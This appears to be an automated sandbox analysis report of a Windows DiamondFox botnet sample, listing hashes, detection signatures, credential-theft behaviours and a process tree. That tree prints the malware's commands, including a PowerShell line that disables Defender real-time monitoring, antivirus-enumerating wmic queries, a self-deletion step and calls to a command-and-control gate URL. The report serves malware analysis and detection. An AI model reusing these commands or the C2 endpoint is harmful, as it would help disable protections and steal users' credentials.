Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
03-07-2021 23:55
Static task
static1
Behavioral task
behavioral1
Sample
mixazed_20210703-205320.exe
Resource
win7v20210410
General
-
Target
mixazed_20210703-205320.exe
-
Size
1.8MB
-
MD5
8703d31eadccffa270ba764a35dfd548
-
SHA1
6dd74fef8122095da64955abd99f38421629445d
-
SHA256
3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187
-
SHA512
f8a878ca57208128dd2e9452ede5596aad819f2cab6d80fb71d7ea3baf1e6df540f28c000cbd64ecdd19e9fbb021ab03ea6050bc1f851a9524cf7d22ea4fd6a2
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Unknown.dll acprotect \Users\Admin\AppData\Local\Temp\Unknown.dll acprotect -
DiamondFox payload 12 IoCs
Detects DiamondFox payload in file/memory.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe diamondfox C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox -
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/4024-229-0x000000000044412E-mapping.dmp MailPassView behavioral2/memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/640-216-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral2/memory/640-218-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
Processes:
resource yara_rule behavioral2/memory/640-216-0x00000000004466F4-mapping.dmp Nirsoft behavioral2/memory/640-218-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral2/memory/2516-226-0x0000000000413E10-mapping.dmp Nirsoft behavioral2/memory/2516-228-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral2/memory/4024-229-0x000000000044412E-mapping.dmp Nirsoft behavioral2/memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
Processes:
d1m5VMTVxQYJevtn.exeDv8Gy0Af.exeDv8Gy0Af.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeUFvoOnkW5oFfKmyk.exepid process 3980 d1m5VMTVxQYJevtn.exe 2216 Dv8Gy0Af.exe 3128 Dv8Gy0Af.exe 904 MicrosoftEdgeCPS.exe 640 MicrosoftEdgeCPS.exe 580 MicrosoftEdgeCPS.exe 2516 MicrosoftEdgeCPS.exe 4024 MicrosoftEdgeCPS.exe 2308 MicrosoftEdgeCPS.exe 3856 MicrosoftEdgeCPS.exe 1272 MicrosoftEdgeCPS.exe 2360 MicrosoftEdgeCPS.exe 416 UFvoOnkW5oFfKmyk.exe -
Processes:
resource yara_rule behavioral2/memory/3140-127-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3140-129-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/2216-133-0x0000000000400000-0x00000000008DC000-memory.dmp upx behavioral2/memory/2216-137-0x0000000000400000-0x00000000008DC000-memory.dmp upx -
Loads dropped DLL 1 IoCs
Processes:
Dv8Gy0Af.exepid process 3128 Dv8Gy0Af.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
mixazed_20210703-205320.exepid process 3140 mixazed_20210703-205320.exe 3140 mixazed_20210703-205320.exe 3140 mixazed_20210703-205320.exe 3140 mixazed_20210703-205320.exe 3140 mixazed_20210703-205320.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
mixazed_20210703-205320.exemixazed_20210703-205320.exeDv8Gy0Af.exeMicrosoftEdgeCPS.exedescription pid process target process PID 740 set thread context of 3140 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 3140 set thread context of 2216 3140 mixazed_20210703-205320.exe Dv8Gy0Af.exe PID 2216 set thread context of 3128 2216 Dv8Gy0Af.exe Dv8Gy0Af.exe PID 904 set thread context of 640 904 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 904 set thread context of 580 904 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 904 set thread context of 2516 904 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 904 set thread context of 4024 904 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 904 set thread context of 2308 904 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 904 set thread context of 3856 904 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 904 set thread context of 1272 904 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 904 set thread context of 2360 904 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2820 taskkill.exe 1164 taskkill.exe 1216 taskkill.exe 1512 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 3772 notepad.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
Processes:
mixazed_20210703-205320.exeDv8Gy0Af.exepowershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 740 mixazed_20210703-205320.exe 3128 Dv8Gy0Af.exe 3128 Dv8Gy0Af.exe 492 powershell.exe 3036 powershell.exe 492 powershell.exe 3036 powershell.exe 3036 powershell.exe 492 powershell.exe 904 MicrosoftEdgeCPS.exe 904 MicrosoftEdgeCPS.exe 640 MicrosoftEdgeCPS.exe 640 MicrosoftEdgeCPS.exe 640 MicrosoftEdgeCPS.exe 640 MicrosoftEdgeCPS.exe 2516 MicrosoftEdgeCPS.exe 2516 MicrosoftEdgeCPS.exe 904 MicrosoftEdgeCPS.exe 904 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
mixazed_20210703-205320.exemixazed_20210703-205320.exeDv8Gy0Af.exepowershell.exepowershell.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 740 mixazed_20210703-205320.exe Token: SeShutdownPrivilege 3140 mixazed_20210703-205320.exe Token: SeDebugPrivilege 3128 Dv8Gy0Af.exe Token: SeDebugPrivilege 3036 powershell.exe Token: SeDebugPrivilege 492 powershell.exe Token: SeIncreaseQuotaPrivilege 580 wmic.exe Token: SeSecurityPrivilege 580 wmic.exe Token: SeTakeOwnershipPrivilege 580 wmic.exe Token: SeLoadDriverPrivilege 580 wmic.exe Token: SeSystemProfilePrivilege 580 wmic.exe Token: SeSystemtimePrivilege 580 wmic.exe Token: SeProfSingleProcessPrivilege 580 wmic.exe Token: SeIncBasePriorityPrivilege 580 wmic.exe Token: SeCreatePagefilePrivilege 580 wmic.exe Token: SeBackupPrivilege 580 wmic.exe Token: SeRestorePrivilege 580 wmic.exe Token: SeShutdownPrivilege 580 wmic.exe Token: SeSystemEnvironmentPrivilege 580 wmic.exe Token: SeRemoteShutdownPrivilege 580 wmic.exe Token: SeUndockPrivilege 580 wmic.exe Token: SeManageVolumePrivilege 580 wmic.exe Token: 33 580 wmic.exe Token: 34 580 wmic.exe Token: 35 580 wmic.exe Token: 36 580 wmic.exe Token: SeIncreaseQuotaPrivilege 580 wmic.exe Token: SeSecurityPrivilege 580 wmic.exe Token: SeTakeOwnershipPrivilege 580 wmic.exe Token: SeLoadDriverPrivilege 580 wmic.exe Token: SeSystemProfilePrivilege 580 wmic.exe Token: SeSystemtimePrivilege 580 wmic.exe Token: SeProfSingleProcessPrivilege 580 wmic.exe Token: SeIncBasePriorityPrivilege 580 wmic.exe Token: SeCreatePagefilePrivilege 580 wmic.exe Token: SeBackupPrivilege 580 wmic.exe Token: SeRestorePrivilege 580 wmic.exe Token: SeShutdownPrivilege 580 wmic.exe Token: SeSystemEnvironmentPrivilege 580 wmic.exe Token: SeRemoteShutdownPrivilege 580 wmic.exe Token: SeUndockPrivilege 580 wmic.exe Token: SeManageVolumePrivilege 580 wmic.exe Token: 33 580 wmic.exe Token: 34 580 wmic.exe Token: 35 580 wmic.exe Token: 36 580 wmic.exe Token: SeIncreaseQuotaPrivilege 2232 wmic.exe Token: SeSecurityPrivilege 2232 wmic.exe Token: SeTakeOwnershipPrivilege 2232 wmic.exe Token: SeLoadDriverPrivilege 2232 wmic.exe Token: SeSystemProfilePrivilege 2232 wmic.exe Token: SeSystemtimePrivilege 2232 wmic.exe Token: SeProfSingleProcessPrivilege 2232 wmic.exe Token: SeIncBasePriorityPrivilege 2232 wmic.exe Token: SeCreatePagefilePrivilege 2232 wmic.exe Token: SeBackupPrivilege 2232 wmic.exe Token: SeRestorePrivilege 2232 wmic.exe Token: SeShutdownPrivilege 2232 wmic.exe Token: SeSystemEnvironmentPrivilege 2232 wmic.exe Token: SeRemoteShutdownPrivilege 2232 wmic.exe Token: SeUndockPrivilege 2232 wmic.exe Token: SeManageVolumePrivilege 2232 wmic.exe Token: 33 2232 wmic.exe Token: 34 2232 wmic.exe Token: 35 2232 wmic.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
mixazed_20210703-205320.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 3140 mixazed_20210703-205320.exe 3140 mixazed_20210703-205320.exe 580 MicrosoftEdgeCPS.exe 3856 MicrosoftEdgeCPS.exe 1272 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
mixazed_20210703-205320.exemixazed_20210703-205320.exeDv8Gy0Af.exed1m5VMTVxQYJevtn.exeMicrosoftEdgeCPS.exedescription pid process target process PID 740 wrote to memory of 2844 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 2844 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 2844 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3468 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3468 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3468 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 2252 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 2252 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 2252 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3140 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3140 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3140 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3140 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3140 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3140 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 740 wrote to memory of 3140 740 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 3140 wrote to memory of 3980 3140 mixazed_20210703-205320.exe d1m5VMTVxQYJevtn.exe PID 3140 wrote to memory of 3980 3140 mixazed_20210703-205320.exe d1m5VMTVxQYJevtn.exe PID 3140 wrote to memory of 3980 3140 mixazed_20210703-205320.exe d1m5VMTVxQYJevtn.exe PID 3140 wrote to memory of 2268 3140 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 3140 wrote to memory of 2268 3140 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 3140 wrote to memory of 2268 3140 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 3140 wrote to memory of 2216 3140 mixazed_20210703-205320.exe Dv8Gy0Af.exe PID 3140 wrote to memory of 2216 3140 mixazed_20210703-205320.exe Dv8Gy0Af.exe PID 3140 wrote to memory of 2216 3140 mixazed_20210703-205320.exe Dv8Gy0Af.exe PID 3140 wrote to memory of 2216 3140 mixazed_20210703-205320.exe Dv8Gy0Af.exe PID 3140 wrote to memory of 2216 3140 mixazed_20210703-205320.exe Dv8Gy0Af.exe PID 3140 wrote to memory of 2216 3140 mixazed_20210703-205320.exe Dv8Gy0Af.exe PID 3140 wrote to memory of 2216 3140 mixazed_20210703-205320.exe Dv8Gy0Af.exe PID 3140 wrote to memory of 2216 3140 mixazed_20210703-205320.exe Dv8Gy0Af.exe PID 2216 wrote to memory of 3128 2216 Dv8Gy0Af.exe Dv8Gy0Af.exe PID 2216 wrote to memory of 3128 2216 Dv8Gy0Af.exe Dv8Gy0Af.exe PID 2216 wrote to memory of 3128 2216 Dv8Gy0Af.exe Dv8Gy0Af.exe PID 2216 wrote to memory of 3128 2216 Dv8Gy0Af.exe Dv8Gy0Af.exe PID 2216 wrote to memory of 3128 2216 Dv8Gy0Af.exe Dv8Gy0Af.exe PID 2216 wrote to memory of 3128 2216 Dv8Gy0Af.exe Dv8Gy0Af.exe PID 2216 wrote to memory of 3128 2216 Dv8Gy0Af.exe Dv8Gy0Af.exe PID 2216 wrote to memory of 3128 2216 Dv8Gy0Af.exe Dv8Gy0Af.exe PID 3980 wrote to memory of 904 3980 d1m5VMTVxQYJevtn.exe MicrosoftEdgeCPS.exe PID 3980 wrote to memory of 904 3980 d1m5VMTVxQYJevtn.exe MicrosoftEdgeCPS.exe PID 3980 wrote to memory of 904 3980 d1m5VMTVxQYJevtn.exe MicrosoftEdgeCPS.exe PID 3980 wrote to memory of 3036 3980 d1m5VMTVxQYJevtn.exe powershell.exe PID 3980 wrote to memory of 3036 3980 d1m5VMTVxQYJevtn.exe powershell.exe PID 3980 wrote to memory of 3036 3980 d1m5VMTVxQYJevtn.exe powershell.exe PID 904 wrote to memory of 492 904 MicrosoftEdgeCPS.exe powershell.exe PID 904 wrote to memory of 492 904 MicrosoftEdgeCPS.exe powershell.exe PID 904 wrote to memory of 492 904 MicrosoftEdgeCPS.exe powershell.exe PID 904 wrote to memory of 580 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 580 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 580 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 2232 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 2232 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 2232 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 2532 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 2532 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 2532 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 640 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 640 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 640 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 2864 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 2864 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 2864 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 688 904 MicrosoftEdgeCPS.exe wmic.exe PID 904 wrote to memory of 688 904 MicrosoftEdgeCPS.exe wmic.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe"C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List5⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
-
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe6⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe6⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List5⤵
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 2308 /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1272 /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 2360 /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 3856 /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe' -Force -Recurse4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe-a "C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.json"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe-a "C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.json"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe"C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe"3⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.jsonMD5
77e6621fd939338d3f19f3dd948ecf43
SHA153df8b3a76c5d6c35a99aa7759ff3bd7ec46588c
SHA2569cb90c1d5c31396519b1f6c73899c062b6ccbd9a8cfc7c0bb054fe88c7825867
SHA5126e812be4c3b958f0497f91e0eb2e8b77d4a13e2b7af750a30ec9bff3dde09a233b5510ee6333a9ab3182c11ab6c3d38789921d517449c6a03164e216cee43c4f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
bc065c5c5d1d183a3d2f98df69ed28fb
SHA195e846090cdb6f07894c2b6f41b511ce377b918a
SHA2563065ae3f485eb795e774a3429ef09825ad1bceb7588788a53e37151533465061
SHA5126cb343fdf0c01f8223b72ea12828a94bb6ff01b004fa5c7aed7fbe3368814e8747d61492ea775205c7aaab2674e45b880aa0f70dea60591adbe951cb2dda637c
-
C:\Users\Admin\AppData\Local\Temp\1.logMD5
4ab56e327e56a995c158a6116430835b
SHA1bf39dbae7798cc8bd7d7073998b09652412b111b
SHA256269c32926bf6faebe0581c23903f8dc8cef41ad46b333435d038b81d47f4785e
SHA51237704769bf293cd6a9c0ccbec359fbb7278f163911d3f2ae27f6c9c3dece55be70c2c5695be953def5984b7eda05953b19581df236c44d5d269cf258e49ab4af
-
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exeMD5
ca42e05f9d53c7ec9383307c1ea282bb
SHA1ed0efa1b59b461dcda08121a39411bee72f6b4cb
SHA25663a7295e66183379580db16d0d191bb261ccc9edb982980051291c8bdf6c4ade
SHA5124a1e3655a93f5e29ac7191eb3249b5b5a61b90353e78cc0bae4e81008aaff43bd9db4c2fde0c5ffcdae5e7eb87dfccffd4a1f383c78f5d40d52cbc4d61890196
-
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exeMD5
ca42e05f9d53c7ec9383307c1ea282bb
SHA1ed0efa1b59b461dcda08121a39411bee72f6b4cb
SHA25663a7295e66183379580db16d0d191bb261ccc9edb982980051291c8bdf6c4ade
SHA5124a1e3655a93f5e29ac7191eb3249b5b5a61b90353e78cc0bae4e81008aaff43bd9db4c2fde0c5ffcdae5e7eb87dfccffd4a1f383c78f5d40d52cbc4d61890196
-
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exeMD5
ca42e05f9d53c7ec9383307c1ea282bb
SHA1ed0efa1b59b461dcda08121a39411bee72f6b4cb
SHA25663a7295e66183379580db16d0d191bb261ccc9edb982980051291c8bdf6c4ade
SHA5124a1e3655a93f5e29ac7191eb3249b5b5a61b90353e78cc0bae4e81008aaff43bd9db4c2fde0c5ffcdae5e7eb87dfccffd4a1f383c78f5d40d52cbc4d61890196
-
C:\Users\Admin\AppData\Local\Temp\License.XenArmorMD5
4f3bde9212e17ef18226866d6ac739b6
SHA1732733bec8314beb81437e60876ffa75e72ae6cd
SHA256212173a405c78d70f90e8ec0699a60ed2f4a9f3a8070de62eabd666c268fb174
SHA51210b7cdae0b9a7b0f8e1bfc66a60675fa9b25c523864d5ae3da243f4e6e4c5194f3bd92af57ac956157442f66414bdd3393d0a1e5ba4ef0f192561e8524d4e744
-
C:\Users\Admin\AppData\Local\Temp\License.XenArmorMD5
bf5da170f7c9a8eae88d1cb1a191ff80
SHA1dd1b991a1b03587a5d1edc94e919a2070e325610
SHA256e5d5110feb21939d82d962981aeaaafc4643b40a9b87cbed800ace82135d57cd
SHA5129e32247d8556fd6efffbf7b6b9c325652d8c4b223b0fa38020879171476a49ab1f64d8897b5d8d92b79c5484fd9d5899be26ca5f664ee1f9c2acb0857084121e
-
C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exeMD5
bcc624fbcc3f06e8b80bb2ed4b065af6
